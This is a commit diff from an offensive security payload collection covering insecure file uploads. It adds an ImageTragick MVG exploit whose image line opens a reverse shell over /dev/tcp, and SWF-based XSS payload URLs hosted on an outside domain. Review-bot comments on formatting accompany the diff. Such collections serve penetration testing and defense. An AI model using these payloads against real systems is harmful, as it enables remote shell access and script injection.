File upload - merging old files
20
Upload insecure files/Image Tragik 2/README.md → Upload insecure files/CVE Image Tragik/README.md
@ -1,6 +1,22 @@
|
|||||||
# Image Tragik 2
|
# Image Tragik 1 & 2
|
||||||
|
|
||||||
## Exploit
|
|
||||||
|
## Exploit v1
|
||||||
|
|
||||||
|
Simple reverse shell
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
push graphic-context
|
||||||
|
encoding "UTF-8"
|
||||||
|
viewbox 0 0 1 1
|
||||||
|
affine 1 0 0 1 0 0
|
||||||
|
push graphic-context
|
||||||
|
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
|
||||||
|
pop graphic-context
|
||||||
|
pop graphic-context
|
||||||
|
```
|
||||||
|
|
||||||
|
## Exploit v2
|
||||||
|
|
||||||
Simple `id` payload
|
Simple `id` payload
|
||||||
|
|
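Review bot: The fence that opens the new "Exploit v1" block is tagged `powershell`, but the content starting at `push graphic-context` is an ImageMagick MVG file, so the tag is wrong and will mis-highlight. Drop the language tag or use a plain text fence. In the same block, `ip` in `/dev/tcp/ip/80` is an unmarked placeholder, and writing it as `<ip>` would make that explicit. The directory is renamed to "CVE Image Tragik", yet the visible README lines name no CVE identifier under either "Exploit v1" or "Exploit v2". Add the identifiers and a short note on the affected component and its fix so the two variants can be told apart.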
0
Upload insecure files/ZIP Symbolic Link/passwd → Upload insecure files/CVE ZIP Symbolic Link/passwd
12
Upload insecure files/Extension Flash/README.md
Normal file
@ -0,0 +1,12 @@
|
|||||||
|
### XSS via SWF
|
||||||
|
|
||||||
|
As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs.
|
||||||
|
This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
|
||||||
|
|
||||||
|
IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
|
||||||
|
|
||||||
|
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
|
||||||
|
```
|
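Review bot: The second paragraph cites "[1] and [2]", but the 12 added lines contain no reference list, so both citations dangle. Add the two links at the end of the file. The first paragraph is written in the first person ("I am going to represent this SWF file"), which leaves it unclear who is speaking in a shared repository, so attribute the text to its source. The three URL lines sit in a `powershell` fence although they are plain URLs. The IE8 and IE9 lines also use typographic quotes (‘ ’) inside the `js=` parameter, which are not JavaScript string delimiters. Use a plain fence and ASCII quotes.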
0
Upload insecure files/PHP Extension/phpinfo.phar → Upload insecure files/Extension PHP/phpinfo.phar
0
Upload insecure files/PHP Extension/phpinfo.php3 → Upload insecure files/Extension PHP/phpinfo.php3
0
Upload insecure files/PHP Extension/phpinfo.php4 → Upload insecure files/Extension PHP/phpinfo.php4
0
Upload insecure files/PHP Extension/phpinfo.php5 → Upload insecure files/Extension PHP/phpinfo.php5
0
Upload insecure files/PHP Extension/phpinfo.php7 → Upload insecure files/Extension PHP/phpinfo.php7
0
Upload insecure files/PHP Extension/phpinfo.phpt → Upload insecure files/Extension PHP/phpinfo.phpt